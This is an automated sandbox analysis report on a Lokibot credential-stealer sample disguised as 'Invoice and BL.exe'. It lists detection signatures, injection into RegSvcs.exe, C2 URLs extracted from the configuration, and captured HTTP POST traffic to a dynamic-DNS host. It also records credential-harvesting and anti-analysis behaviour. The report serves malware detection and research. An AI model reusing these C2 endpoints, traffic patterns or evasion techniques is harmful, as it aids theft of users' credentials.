Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report Invoice and BL.exe

Overview

General Information

Sample Name:Invoice and BL.exe
Analysis ID:458970
MD5:3c7b342067f6142e6ed45551f5f60c50
SHA1:d83513aa4ac743b7fe0f7d1052a37b5ef1b50f60
SHA256:419865b95d9a00faea2d00122baabd7c2ea0be23dd5d3f15eae589bb5a6beecd
Tags:exeLoki
Infos:

Most interesting Screenshot:

Detection

Lokibot
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Yara detected AntiVM3
Yara detected Lokibot
.NET source code contains potential unpacker
.NET source code contains very large strings
C2 URLs / IPs found in malware configuration
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Machine Learning detection for sample
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file access)
Tries to steal Mail credentials (via file registry)
Uses dynamic DNS services
Writes to foreign memory regions
Yara detected aPLib compressed binary
Checks if the current process is being debugged
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • Invoice and BL.exe (PID: 1152 cmdline: 'C:\Users\user\Desktop\Invoice and BL.exe' MD5: 3C7B342067F6142E6ED45551F5F60C50)
    • RegSvcs.exe (PID: 5412 cmdline: {path} MD5: 2867A3817C9245F7CF518524DFD18F28)
  • cleanup

Malware Configuration

Threatname: Lokibot

{"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000007.00000002.294466298.0000000000400000.00000040.00000001.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    00000007.00000002.294466298.0000000000400000.00000040.00000001.sdmpJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
      00000007.00000002.294466298.0000000000400000.00000040.00000001.sdmpJoeSecurity_LokibotYara detected LokibotJoe Security
        00000007.00000002.294466298.0000000000400000.00000040.00000001.sdmpLoki_1Loki Payloadkevoreilly
        • 0x151b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW
        • 0x153fc:$a2: last_compatible_version
        00000007.00000002.294466298.0000000000400000.00000040.00000001.sdmpLokibotdetect Lokibot in memoryJPCERT/CC Incident Response Group
        • 0x13bff:$des3: 68 03 66 00 00
        • 0x187f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X
        • 0x188bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
        Click to see the 13 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        0.2.Invoice and BL.exe.397e408.3.unpackSUSP_XORed_URL_in_EXEDetects an XORed URL in an executableFlorian Roth
        • 0x13278:$s1: http://
        • 0x16233:$s1: http://
        • 0x16c74:$s1: \x97\x8B\x8B\x8F\xC5\xD0\xD0
        • 0x13280:$s2: https://
        • 0x13278:$f1: http://
        • 0x16233:$f1: http://
        • 0x13280:$f2: https://
        0.2.Invoice and BL.exe.397e408.3.unpackJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
          0.2.Invoice and BL.exe.397e408.3.unpackLoki_1Loki Payloadkevoreilly
          • 0x131b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW
          • 0x133fc:$a2: last_compatible_version
          0.2.Invoice and BL.exe.397e408.3.unpackLokibotdetect Lokibot in memoryJPCERT/CC Incident Response Group
          • 0x123ff:$des3: 68 03 66 00 00
          • 0x15ff0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X
          • 0x160bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
          7.2.RegSvcs.exe.400000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            Click to see the 15 entries

            Sigma Overview

            No Sigma rule has matched

            Jbx Signature Overview

            Click to jump to signature section

            Show All Signature Results

            AV Detection:

            barindex
            Found malware configurationShow sources
            Source: 00000007.00000002.294466298.0000000000400000.00000040.00000001.sdmpMalware Configuration Extractor: Lokibot {"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php"]}
            Multi AV Scanner detection for domain / URLShow sources
            Source: abixmaly.duckdns.orgVirustotal: Detection: 10%Perma Link
            Source: http://abixmaly.duckdns.org/binge/fre.phpVirustotal: Detection: 13%Perma Link
            Multi AV Scanner detection for submitted fileShow sources
            Source: Invoice and BL.exeVirustotal: Detection: 59%Perma Link
            Source: Invoice and BL.exeMetadefender: Detection: 31%Perma Link
            Source: Invoice and BL.exeReversingLabs: Detection: 60%
            Machine Learning detection for sampleShow sources
            Source: Invoice and BL.exeJoe Sandbox ML: detected
            Source: Invoice and BL.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
            Source: Invoice and BL.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
            Source: Binary string: RegSvcs.pdb, source: RegSvcs.exe, 00000007.00000002.294503842.0000000000832000.00000002.00020000.sdmp
            Source: Binary string: RegSvcs.pdb source: RegSvcs.exe
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,

            Networking:

            barindex
            C2 URLs / IPs found in malware configurationShow sources
            Source: Malware configuration extractorURLs: http://kbfvzoboss.bid/alien/fre.php
            Source: Malware configuration extractorURLs: http://alphastand.trade/alien/fre.php
            Source: Malware configuration extractorURLs: http://alphastand.win/alien/fre.php
            Source: Malware configuration extractorURLs: http://alphastand.top/alien/fre.php
            Uses dynamic DNS servicesShow sources
            Source: unknownDNS query: name: abixmaly.duckdns.org
            Source: Joe Sandbox ViewIP Address: 192.169.69.26 192.169.69.26
            Source: Joe Sandbox ViewIP Address: 192.169.69.26 192.169.69.26
            Source: Joe Sandbox ViewASN Name: WOWUS WOWUS
            Source: global trafficHTTP traffic detected: POST /binge/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: abixmaly.duckdns.orgAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D82FEB54Content-Length: 190Connection: close
            Source: global trafficHTTP traffic detected: POST /binge/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: abixmaly.duckdns.orgAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D82FEB54Content-Length: 190Connection: close
            Source: global trafficHTTP traffic detected: POST /binge/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: abixmaly.duckdns.orgAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D82FEB54Content-Length: 163Connection: close
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00404ED4 recv,
            Source: unknownDNS traffic detected: queries for: abixmaly.duckdns.org
            Source: unknownHTTP traffic detected: POST /binge/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: abixmaly.duckdns.orgAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D82FEB54Content-Length: 190Connection: close
            Source: RegSvcs.exe, 00000007.00000002.294776027.0000000000F64000.00000004.00000020.sdmpString found in binary or memory: http://abixmaly.duckdns.org/binge/fre.php
            Source: RegSvcs.exe, 00000007.00000002.294755116.0000000000F48000.00000004.00000020.sdmpString found in binary or memory: http://abixmaly.duckdns.org/binge/fre.phpNg
            Source: Invoice and BL.exe, 00000000.00000002.293371839.0000000006912000.00000004.00000001.sdmpString found in binary or memory: http://fontfabrik.com
            Source: Invoice and BL.exe, 00000000.00000002.293371839.0000000006912000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
            Source: Invoice and BL.exe, 00000000.00000002.293371839.0000000006912000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
            Source: Invoice and BL.exe, 00000000.00000002.293371839.0000000006912000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
            Source: Invoice and BL.exe, 00000000.00000002.293371839.0000000006912000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
            Source: Invoice and BL.exe, 00000000.00000002.293371839.0000000006912000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
            Source: Invoice and BL.exe, 00000000.00000002.293371839.0000000006912000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
            Source: Invoice and BL.exe, 00000000.00000002.293371839.0000000006912000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
            Source: Invoice and BL.exe, 00000000.00000002.293371839.0000000006912000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
            Source: Invoice and BL.exe, 00000000.00000002.293371839.0000000006912000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
            Source: Invoice and BL.exe, 00000000.00000002.293371839.0000000006912000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
            Source: Invoice and BL.exe, 00000000.00000002.293371839.0000000006912000.00000004.00000001.sdmpString found in binary or memory: http://www.fonts.com
            Source: Invoice and BL.exe, 00000000.00000002.293371839.0000000006912000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
            Source: Invoice and BL.exe, 00000000.00000002.293371839.0000000006912000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
            Source: Invoice and BL.exe, 00000000.00000002.293371839.0000000006912000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
            Source: Invoice and BL.exe, 00000000.00000002.293371839.0000000006912000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
            Source: Invoice and BL.exe, 00000000.00000002.293371839.0000000006912000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
            Source: Invoice and BL.exe, 00000000.00000002.293371839.0000000006912000.00000004.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
            Source: RegSvcs.exe, RegSvcs.exe, 00000007.00000002.294466298.0000000000400000.00000040.00000001.sdmpString found in binary or memory: http://www.ibsensoftware.com/
            Source: Invoice and BL.exe, 00000000.00000002.293371839.0000000006912000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
            Source: Invoice and BL.exe, 00000000.00000002.293371839.0000000006912000.00000004.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
            Source: Invoice and BL.exe, 00000000.00000002.293371839.0000000006912000.00000004.00000001.sdmpString found in binary or memory: http://www.sakkal.com
            Source: Invoice and BL.exe, 00000000.00000002.293371839.0000000006912000.00000004.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
            Source: Invoice and BL.exe, 00000000.00000002.293371839.0000000006912000.00000004.00000001.sdmpString found in binary or memory: http://www.tiro.com
            Source: Invoice and BL.exe, 00000000.00000002.293371839.0000000006912000.00000004.00000001.sdmpString found in binary or memory: http://www.typography.netD
            Source: Invoice and BL.exe, 00000000.00000002.293371839.0000000006912000.00000004.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
            Source: Invoice and BL.exe, 00000000.00000002.293371839.0000000006912000.00000004.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn

            System Summary:

            barindex
            Malicious sample detected (through community Yara rule)Show sources
            Source: 0.2.Invoice and BL.exe.397e408.3.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
            Source: 0.2.Invoice and BL.exe.397e408.3.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
            Source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
            Source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
            Source: 7.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
            Source: 7.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
            Source: 0.2.Invoice and BL.exe.397e408.3.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
            Source: 0.2.Invoice and BL.exe.397e408.3.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
            Source: 00000007.00000002.294466298.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
            Source: 00000007.00000002.294466298.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
            Source: 00000000.00000002.289975656.0000000003912000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
            Source: 00000000.00000002.289177832.00000000027F1000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
            .NET source code contains very large stringsShow sources
            Source: Invoice and BL.exe, NodeGraphControl/NodeGraphNode.csLong String: Length: 24686
            Source: 0.2.Invoice and BL.exe.370000.0.unpack, NodeGraphControl/NodeGraphNode.csLong String: Length: 24686
            Source: 0.0.Invoice and BL.exe.370000.0.unpack, NodeGraphControl/NodeGraphNode.csLong String: Length: 24686
            Initial sample is a PE file and has a suspicious nameShow sources
            Source: initial sampleStatic PE information: Filename: Invoice and BL.exe
            Source: C:\Users\user\Desktop\Invoice and BL.exeCode function: 0_2_00BD7C23
            Source: C:\Users\user\Desktop\Invoice and BL.exeCode function: 0_2_00BD0208
            Source: C:\Users\user\Desktop\Invoice and BL.exeCode function: 0_2_00BD25B8
            Source: C:\Users\user\Desktop\Invoice and BL.exeCode function: 0_2_00BD5B90
            Source: C:\Users\user\Desktop\Invoice and BL.exeCode function: 0_2_00BD5918
            Source: C:\Users\user\Desktop\Invoice and BL.exeCode function: 0_2_00BD1140
            Source: C:\Users\user\Desktop\Invoice and BL.exeCode function: 0_2_00BD1C98
            Source: C:\Users\user\Desktop\Invoice and BL.exeCode function: 0_2_00BD1620
            Source: C:\Users\user\Desktop\Invoice and BL.exeCode function: 0_2_00BD1622
            Source: C:\Users\user\Desktop\Invoice and BL.exeCode function: 0_2_00BD3610
            Source: C:\Users\user\Desktop\Invoice and BL.exeCode function: 0_2_00BD0006
            Source: C:\Users\user\Desktop\Invoice and BL.exeCode function: 0_2_00BD2A50
            Source: C:\Users\user\Desktop\Invoice and BL.exeCode function: 0_2_00BD1C50
            Source: C:\Users\user\Desktop\Invoice and BL.exeCode function: 0_2_00BD1640
            Source: C:\Users\user\Desktop\Invoice and BL.exeCode function: 0_2_00BD0040
            Source: C:\Users\user\Desktop\Invoice and BL.exeCode function: 0_2_00BD11B9
            Source: C:\Users\user\Desktop\Invoice and BL.exeCode function: 0_2_00BD25B3
            Source: C:\Users\user\Desktop\Invoice and BL.exeCode function: 0_2_00BD2F98
            Source: C:\Users\user\Desktop\Invoice and BL.exeCode function: 0_2_00BD5590
            Source: C:\Users\user\Desktop\Invoice and BL.exeCode function: 0_2_00BD5B8C
            Source: C:\Users\user\Desktop\Invoice and BL.exeCode function: 0_2_00BD2F88
            Source: C:\Users\user\Desktop\Invoice and BL.exeCode function: 0_2_00BD5580
            Source: C:\Users\user\Desktop\Invoice and BL.exeCode function: 0_2_00BD01F9
            Source: C:\Users\user\Desktop\Invoice and BL.exeCode function: 0_2_00BD35C5
            Source: C:\Users\user\Desktop\Invoice and BL.exeCode function: 0_2_00BD113C
            Source: C:\Users\user\Desktop\Invoice and BL.exeCode function: 0_2_00BD1524
            Source: C:\Users\user\Desktop\Invoice and BL.exeCode function: 0_2_00BD5908
            Source: C:\Users\user\Desktop\Invoice and BL.exeCode function: 0_2_0279C124
            Source: C:\Users\user\Desktop\Invoice and BL.exeCode function: 0_2_0279E570
            Source: C:\Users\user\Desktop\Invoice and BL.exeCode function: 0_2_0279E560
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0040549C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_004029D4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 0041219C appears 45 times
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 00405B6F appears 42 times
            Source: Invoice and BL.exe, 00000000.00000002.290027759.00000000039B8000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameMajorRevision.exe< vs Invoice and BL.exe
            Source: Invoice and BL.exe, 00000000.00000002.288539858.00000000003F4000.00000002.00020000.sdmpBinary or memory string: OriginalFilenamesH7BDA6.exeD vs Invoice and BL.exe
            Source: Invoice and BL.exe, 00000000.00000002.298627197.0000000008520000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemscorrc.dllT vs Invoice and BL.exe
            Source: Invoice and BL.exe, 00000000.00000002.289489186.0000000002ACA000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameResource_Meter.dll> vs Invoice and BL.exe
            Source: Invoice and BL.exeBinary or memory string: OriginalFilenamesH7BDA6.exeD vs Invoice and BL.exe
            Source: Invoice and BL.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
            Source: 0.2.Invoice and BL.exe.397e408.3.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
            Source: 0.2.Invoice and BL.exe.397e408.3.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
            Source: 0.2.Invoice and BL.exe.397e408.3.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
            Source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
            Source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
            Source: 7.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
            Source: 7.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
            Source: 0.2.Invoice and BL.exe.397e408.3.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
            Source: 0.2.Invoice and BL.exe.397e408.3.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
            Source: 0.2.Invoice and BL.exe.397e408.3.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
            Source: 00000007.00000002.294466298.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
            Source: 00000007.00000002.294466298.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
            Source: 00000000.00000002.289975656.0000000003912000.00000004.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
            Source: 00000000.00000002.289177832.00000000027F1000.00000004.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/3@3/1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0040650A LookupPrivilegeValueW,AdjustTokenPrivileges,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0040434D CoInitialize,CoCreateInstance,VariantInit,SysAllocString,VariantInit,VariantInit,SysAllocString,VariantInit,SysFreeString,SysFreeString,CoUninitialize,
            Source: C:\Users\user\Desktop\Invoice and BL.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Invoice and BL.exe.logJump to behavior
            Source: C:\Users\user\Desktop\Invoice and BL.exeMutant created: \Sessions\1\BaseNamedObjects\qnrJUclcstb
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMutant created: \Sessions\1\BaseNamedObjects\8F9C4E9C79A3B52B3F739430
            Source: Invoice and BL.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\Invoice and BL.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
            Source: C:\Users\user\Desktop\Invoice and BL.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: Invoice and BL.exeVirustotal: Detection: 59%
            Source: Invoice and BL.exeMetadefender: Detection: 31%
            Source: Invoice and BL.exeReversingLabs: Detection: 60%
            Source: unknownProcess created: C:\Users\user\Desktop\Invoice and BL.exe 'C:\Users\user\Desktop\Invoice and BL.exe'
            Source: C:\Users\user\Desktop\Invoice and BL.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe {path}
            Source: C:\Users\user\Desktop\Invoice and BL.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe {path}
            Source: C:\Users\user\Desktop\Invoice and BL.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook
            Source: Invoice and BL.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: Invoice and BL.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
            Source: Binary string: RegSvcs.pdb, source: RegSvcs.exe, 00000007.00000002.294503842.0000000000832000.00000002.00020000.sdmp
            Source: Binary string: RegSvcs.pdb source: RegSvcs.exe

            Data Obfuscation:

            barindex
            .NET source code contains potential unpackerShow sources
            Source: Invoice and BL.exe, NodeGraphControl/frmGiris.cs.Net Code: X_123123454363 System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
            Source: 0.2.Invoice and BL.exe.370000.0.unpack, NodeGraphControl/frmGiris.cs.Net Code: X_123123454363 System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
            Source: 0.0.Invoice and BL.exe.370000.0.unpack, NodeGraphControl/frmGiris.cs.Net Code: X_123123454363 System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
            Yara detected aPLib compressed binaryShow sources
            Source: Yara matchFile source: 0.2.Invoice and BL.exe.397e408.3.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 7.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.Invoice and BL.exe.397e408.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000007.00000002.294466298.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.289975656.0000000003912000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.289177832.00000000027F1000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Invoice and BL.exe PID: 1152, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 5412, type: MEMORYSTR
            Source: C:\Users\user\Desktop\Invoice and BL.exeCode function: 0_2_00BD2A48 push esp; iretd
            Source: C:\Users\user\Desktop\Invoice and BL.exeCode function: 0_2_00BD67A6 push esp; retf 0021h
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00402AC0 push eax; ret
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00402AC0 push eax; ret
            Source: initial sampleStatic PE information: section name: .text entropy: 7.07527531972
            Source: C:\Users\user\Desktop\Invoice and BL.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Invoice and BL.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Invoice and BL.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Invoice and BL.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Invoice and BL.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Invoice and BL.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Invoice and BL.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Invoice and BL.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Invoice and BL.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Invoice and BL.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Invoice and BL.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Invoice and BL.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Invoice and BL.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Invoice and BL.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Invoice and BL.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Invoice and BL.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Invoice and BL.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Invoice and BL.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Invoice and BL.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Invoice and BL.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Invoice and BL.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\Invoice and BL.exeProcess information set: NOOPENFILEERRORBOX
